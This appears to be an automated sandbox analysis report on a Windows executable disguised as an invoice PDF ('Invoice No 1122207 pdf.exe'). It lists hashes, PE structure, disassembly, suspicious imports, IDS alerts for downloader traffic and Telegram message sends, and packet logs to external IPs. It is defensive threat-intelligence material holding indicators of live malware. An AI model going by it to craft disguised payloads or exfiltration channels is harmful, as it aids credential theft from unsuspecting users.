TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Invoice No 1122207 pdf.exe
File size:	1'586'176 bytes
MD5:	f4d3b326b29b4d0d8269499be0bc6b7f
SHA1:	f64f81909454b15dba91e95d5da9d7684cfc59f1
SHA256:	c3290e5cf7ebc77727f778129c3e235bbb23bdf2cc6136e4a442e7034da7abe5
SHA512:	553cf511061e2862e8218ec0ff8a34c9cf5efafe7b7c4ba3b07a0c105d5e238a17e697a5582b7d825cf065566b26666f48a2dcd59096fc64c5cf40eb90cea50b
SSDEEP:	49152:0TvC/MTQYxsWR7a98rj1xQdK6xKXbo7Q:UjTQYxsWR/MnKXmQ
TLSH:	F475E0027391D062FF9B92734B5AF6115BBC79260123E62F13981CBABD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x678715C8 [Wed Jan 15 01:56:24 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F72A8D3C5D3h
jmp 00007F72A8D3BEDFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F72A8D3C0BDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F72A8D3C08Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F72A8D3EC7Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F72A8D3ECC8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F72A8D3ECB1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xac904	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x181000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xac904	0xaca00	0e9994fac4acb27066ee9f7501d7e4f5	False	0.9620462979724838	data	7.960540014978499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x181000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa3bca	data			1.0003146126387799
RT_GROUP_ICON	0x180384	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1803fc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x180410	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x180424	0x14	data	English	Great Britain	1.25
RT_VERSION	0x180438	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x180514	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T15:02:04.408435+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:05.614594+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:06.957849+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:08.123712+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:09.292653+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:10.411397+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:12.302305+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49707	158.101.44.242	80	TCP
2025-01-15T15:02:12.908495+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49770	104.21.112.1	443	TCP
2025-01-15T15:02:13.942643+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49775	158.101.44.242	80	TCP
2025-01-15T15:02:15.758577+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:16.603380+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49796	104.21.112.1	443	TCP
2025-01-15T15:02:16.954657+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:17.519042+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49803	149.154.167.220	443	TCP
2025-01-15T15:02:18.113309+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:19.317671+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:20.489534+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:22.273173+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:23.395876+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49776	158.101.44.242	80	TCP
2025-01-15T15:02:23.985692+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49848	104.21.112.1	443	TCP
2025-01-15T15:02:25.255144+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49853	158.101.44.242	80	TCP
2025-01-15T15:02:25.821599+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49859	104.21.112.1	443	TCP
2025-01-15T15:02:28.333913+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49873	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:02:01.432063103 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:01.437041044 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:01.437201977 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:01.437635899 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:01.442523956 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:03.210124016 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:03.216758013 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:03.221544981 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:04.390697956 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:04.408435106 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:04.413204908 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:05.566806078 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:05.614593983 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:05.794229984 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:05.799196959 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:06.953885078 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:06.957849026 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:06.962733984 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:08.114996910 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:08.123712063 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:08.128590107 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:09.288652897 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:09.292653084 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:09.297449112 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:10.362726927 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:10.411396980 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:10.413234949 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:10.413263083 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:10.413619995 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:10.418437958 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:10.418457031 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:10.978863001 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:10.978987932 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.041275978 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.041310072 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:11.042433977 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:11.087656975 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.227885962 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.275338888 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:11.346127987 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:11.346293926 CET	443	49758	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:11.346343040 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.360552073 CET	49758	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:11.397558928 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:11.402338028 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:12.257038116 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:12.264736891 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.264780998 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.264864922 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.265259981 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.265270948 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.302304983 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.748205900 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.751646996 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.751672029 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.908520937 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.908593893 CET	443	49770	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:12.908798933 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.909598112 CET	49770	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:12.919028997 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.920375109 CET	49775	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.924009085 CET	80	49707	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:12.924072027 CET	49707	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.925146103 CET	80	49775	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:12.925232887 CET	49775	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.925359011 CET	49775	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:12.930100918 CET	80	49775	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:13.419821024 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:13.424684048 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:13.424793005 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:13.432275057 CET	49776	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:13.437100887 CET	80	49776	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:13.894788027 CET	80	49775	158.101.44.242	192.168.2.10
Jan 15, 2025 15:02:13.896394014 CET	49782	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:13.896426916 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:13.896508932 CET	49782	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:13.896804094 CET	49782	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:13.896821022 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:13.942642927 CET	49775	80	192.168.2.10	158.101.44.242
Jan 15, 2025 15:02:14.367063046 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:14.369201899 CET	49782	443	192.168.2.10	104.21.112.1
Jan 15, 2025 15:02:14.369234085 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:14.526541948 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:14.526705980 CET	443	49782	104.21.112.1	192.168.2.10
Jan 15, 2025 15:02:14.526774883 CET	49782	443	192.168.2.10	104.21.112.1
